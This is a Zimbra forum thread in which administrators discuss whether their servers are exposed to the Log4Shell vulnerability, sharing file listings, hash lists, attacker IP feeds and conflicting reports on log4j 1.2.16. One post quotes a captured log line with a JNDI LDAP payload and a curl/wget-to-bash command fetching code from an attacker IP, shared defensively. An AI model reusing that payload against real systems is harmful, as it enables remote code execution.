log4j-zero-day exploit - active attacks
log4j-zero-day exploit - active attacks
Hi
Need for confirmation. Zimbra used log4j - and now I got alert from CVE with threat 10/10.
If and if yes, to what extend and what version of Zimbra servers are affected.
https://wiki.zimbra.com/wiki/Using_log4 ... xd_Logging
about exploit:
"unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1"
https://www.bleepingcomputer.com/news/s ... nightmare/
how this is working:
https://www.lunasec.io/docs/blog/log4j-zero-day/
Need for confirmation. Zimbra used log4j - and now I got alert from CVE with threat 10/10.
If and if yes, to what extend and what version of Zimbra servers are affected.
https://wiki.zimbra.com/wiki/Using_log4 ... xd_Logging
about exploit:
"unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1"
https://www.bleepingcomputer.com/news/s ... nightmare/
how this is working:
https://www.lunasec.io/docs/blog/log4j-zero-day/
- JDunphy
- Outstanding Member
- Posts: 945
- Joined: Fri Sep 12, 2014 11:18 pm
- Location: Victoria, BC
- ZCS/ZD Version: 9.0.0_P44 NETWORK Edition
Re: log4j-zero-day exploit - active attacks
I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?
It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:
Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
List of attacking ip's for ipset's, etc. GreyNoise is providing these in real-time of ip's that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv
Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/
Jim
It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:
Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
List of attacking ip's for ipset's, etc. GreyNoise is providing these in real-time of ip's that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv
Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/
Jim
-
- Advanced member
- Posts: 60
- Joined: Fri Sep 12, 2014 10:27 pm
- ZCS/ZD Version: 9.0.0 Patch 40 RHEL
Re: log4j-zero-day exploit - active attacks
This post on confluence community also suggests ver. 1.x not vulnerable to the JNDI exploit, but I can't verify that.
Looking for log4j all I can see is:
Looking for log4j all I can see is:
Code: Select all
# find / -name *log4j*
/opt/zimbra/common/jetty_home/modules/logging-log4j.mod
/opt/zimbra/common/jetty_home/modules/logging-log4j2.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j2.mod
/opt/zimbra/common/jetty_home/modules/log4j2-slf4j.mod
/opt/zimbra/common/jetty_home/modules/log4j-impl
/opt/zimbra/common/jetty_home/modules/log4j-impl/resources/log4j.xml
/opt/zimbra/common/jetty_home/modules/log4j-impl.mod
/opt/zimbra/common/jetty_home/modules/log4j2-api.mod
/opt/zimbra/common/jetty_home/modules/log4j2-impl
/opt/zimbra/common/jetty_home/modules/log4j2-impl/resources/log4j2.xml
/opt/zimbra/common/jetty_home/modules/log4j2-impl.mod
/opt/zimbra/conf/log4j.properties.in
/opt/zimbra/conf/milter.log4j.properties
/opt/zimbra/conf/zmconfigd.log4j.properties
/opt/zimbra/conf/log4j.properties
/opt/zimbra/lib/jars/apache-log4j-extras-1.0.jar
/opt/zimbra/lib/jars/slf4j-log4j12-1.7.30.jar
/opt/zimbra/lib/jars/log4j-1.2.16.jar
/opt/zimbra/lib/jars/syslog4j-0.9.46.jar
/opt/zimbra/log/zmconfigd-log4j.log
Re: log4j-zero-day exploit - active attacks
Thanks for that .csv file. Just implemented a script to block that ip's on firewalls.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.
I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.
And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?
Thanks.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.
I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.
And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?
Thanks.
JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?
It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:
Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
List of attacking ip's for ipset's, etc. GreyNoise is providing these in real-time of ip's that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv
Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/
Jim
-
- Advanced member
- Posts: 60
- Joined: Fri Sep 12, 2014 10:27 pm
- ZCS/ZD Version: 9.0.0 Patch 40 RHEL
Re: log4j-zero-day exploit - active attacks
In Jim's link to the hashes above, they mention 1.x might be vulnerable too with a link to this github issue mentioning an avenue lookups could be triggered?JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?
It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:
Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
Jim
Re: log4j-zero-day exploit - active attacks
I have tested a Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.irv wrote:Thanks for that .csv file. Just implemented a script to block that ip's on firewalls.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.
I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.
And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?
Thanks.
(lib log4j-1.2.16.jar)
Re: log4j-zero-day exploit - active attacks
45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwg(......)}"
(curl -s 45.155.205.233:5874/(cut):80||wget -q -O- 45.155.205.233:5874/(cut):80)|bash
I found that, so looks like they are trying.
I think fail2ban on firewall + log monitoring can help tempolary to cut of that attacks.
(curl -s 45.155.205.233:5874/(cut):80||wget -q -O- 45.155.205.233:5874/(cut):80)|bash
I found that, so looks like they are trying.
I think fail2ban on firewall + log monitoring can help tempolary to cut of that attacks.
sigtrap wrote:I have tested a Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.irv wrote:Thanks for that .csv file. Just implemented a script to block that ip's on firewalls.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.
I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.
And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?
Thanks.
(lib log4j-1.2.16.jar)
Re: log4j-zero-day exploit - active attacks
Can confirm Zimbra 8.8.15_GA_4177 is vulnerable as well.
- L. Mark Stone
- Ambassador
- Posts: 2862
- Joined: Wed Oct 09, 2013 11:35 am
- Location: Portland, Maine, US
- ZCS/ZD Version: 10.0.13 Network Edition
- Contact:
Re: log4j-zero-day exploit - active attacks
I opened a Support Case with Zimbra on this earlier today. Zimbra have reported back to me that the 1.2.16 version of Log4j used by Zimbra is NOT subject to this exploit.
If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.
All the best,
Mark
If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.
All the best,
Mark
___________________________________
L. Mark Stone
Mission Critical Email - Zimbra VAR/BSP/Training Partner https://www.missioncriticalemail.com/
AWS Certified Solutions Architect-Associate
L. Mark Stone
Mission Critical Email - Zimbra VAR/BSP/Training Partner https://www.missioncriticalemail.com/
AWS Certified Solutions Architect-Associate
Re: log4j-zero-day exploit - active attacks
I don't see an option to send you a PM. Might be as my account is new or something. Am happy to send you infos to replicate it yourself.L. Mark Stone wrote: If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.